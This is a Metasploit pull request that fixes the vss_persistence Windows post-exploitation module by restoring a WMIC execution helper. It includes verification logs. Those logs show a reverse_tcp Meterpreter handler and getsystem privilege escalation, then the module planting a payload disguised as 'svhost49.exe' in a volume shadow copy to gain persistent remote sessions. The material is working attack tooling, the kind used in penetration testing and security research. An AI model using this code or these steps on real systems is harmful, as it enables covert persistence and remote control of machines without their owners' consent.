### PR TITLE
Fix #4558 (vss_persistence fails) by restoring the old wmicexec

### DIFF
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -194,4 +194,51 @@ class Metasploit3 < Msf::Exploit::Local
     print_status("Cleanup Meterpreter RC File: #{clean_rc}")
   end
 
+  #
+  # Execute a WMIC command
+  #
+  def wmic_query(wmic_cmd)
+    tmp_out = ''
+    old_timeout = session.response_timeout
+    session.response_timeout = 120
+    begin
+      tmp = expand_path('%TEMP%')
+      wmi_cfl = tmp + "\\" + sprintf('%.5d', rand(100000))
+      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
+      Rex.sleep(2)
+
+      # Making sure that wmic finishes before executing next wmic command
+      found = 0
+      while found == 0
+        session.sys.process.get_processes.each do |x|
+          found =1
+          if 'wmic.exe' == x['name'].downcase
+            Rex.sleep(0.5)
+            found = 0
+          end
+        end
+      end
+      r.close
+
+      # Give the process time to flush the output
+      Rex.sleep(2)
+
+      # Read the output file of the wmic commands
+      wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')
+      until wmi_out_file.eof?
+        tmp_out << wmi_out_file.read
+      end
+      wmi_out_file.close
+    rescue ::Exception => e
+      print_error("Error running WMIC commands: #{e.class} #{e}")
+    end
+    # We delete the file with the wmic command output.
+    c = session.sys.process.execute("cmd.exe /c del #{wmi_cfl}", nil, {'Hidden' => true})
+    c.close
+    tmp_out.gsub!(/[^[:print:]]/,'') #scrub out garbage
+
+    session.response_timeout = old_timeout
+    tmp_out
+  end
+
 end

--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -46,6 +46,7 @@ class Metasploit3 < Msf::Exploit::Local
         OptBool.new('SCHTASK', [ true, 'Create a Scheduled Task for the EXE.', false]),
         OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),
         OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),
+        OptInt.new('WMIC_WRITE_TIMEOUT', [ true, 'Timeout in seconds to allow the wmic process to flush output', 5]),
         OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
       ], self.class)
 
@@ -221,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Local
       r.close
 
       # Give the process time to flush the output
-      Rex.sleep(2)
+      Rex.sleep(datastore['WMIC_WRITE_TIMEOUT'])
 
       # Read the output file of the wmic commands
       wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')


### PR DESCRIPTION
This PR tries to fix #4558.

According to my analysis, vss_persistence stopped working after https://github.com/rapid7/metasploit-framework/pull/2764

The verification steps on #2764 specifically asked to verify the vss_persistence module. Unfortunately it was not done as far as I can say, since the checkbox isn't marked and isn't proof of working in the pull request neither. This is _why_ we need to follow verification steps unless we're 100% sure something won't break something. Specially when landing library/core code affecting a bunch of modules.

Since I don't feel comfortable reversing #2764 because it has been for a long time and are major changes to the WMI code (code which I'm not super familiar with really). I'm going to propose a hack fix here, I'm not super happy with it but works. It allows the vss_persistence module to provide its own "wmic_query" method. This "wmic_query" restores the old "wmicexec" method deleted on #2764: https://github.com/rapid7/metasploit-framework/pull/2764/files#diff-c0c110de07cb836cf9efc15dfd3ff698L197

Verification
- [x] Install a WIndows 7 SP1 32 bits target
- [x] Run the msfconsole with a handler, and get an `Administrator` session from the target:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49173) at 2015-07-27 14:11:51 -0500
```
- [x] Use `getsystem` on the session to elevate it, then background the session

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 1...
```
- [x] Finally use the vss_persistence module to get a new session: 

```
msf exploit(handler) > use exploit/windows/local/vss_persistence
msf exploit(vss_persistence) > set rhost 172.16.158.132
rhost => 172.16.158.132
msf exploit(vss_persistence) > set session 1
session => 1
msf exploit(vss_persistence) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Checking requirements...
[*] Starting Volume Shadow Service...
[*] Volume Shadow Copy service is running.
[*] Software Shadow Copy service is running.
[*] Uploading payload...
[*] Creating Shadow Volume Copy...
[*] ShadowCopy created successfully
[*] Finding the Shadow Copy Volume...
[*] Deleting malware...
[*] Executing \Windows\Temp\svhost49.exe...
[*] Sending stage (885806 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.132:49175) at 2015-07-27 14:12:43 -0500

meterpreter > getuid
sServer username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(vss_persistence) > exit -y
```
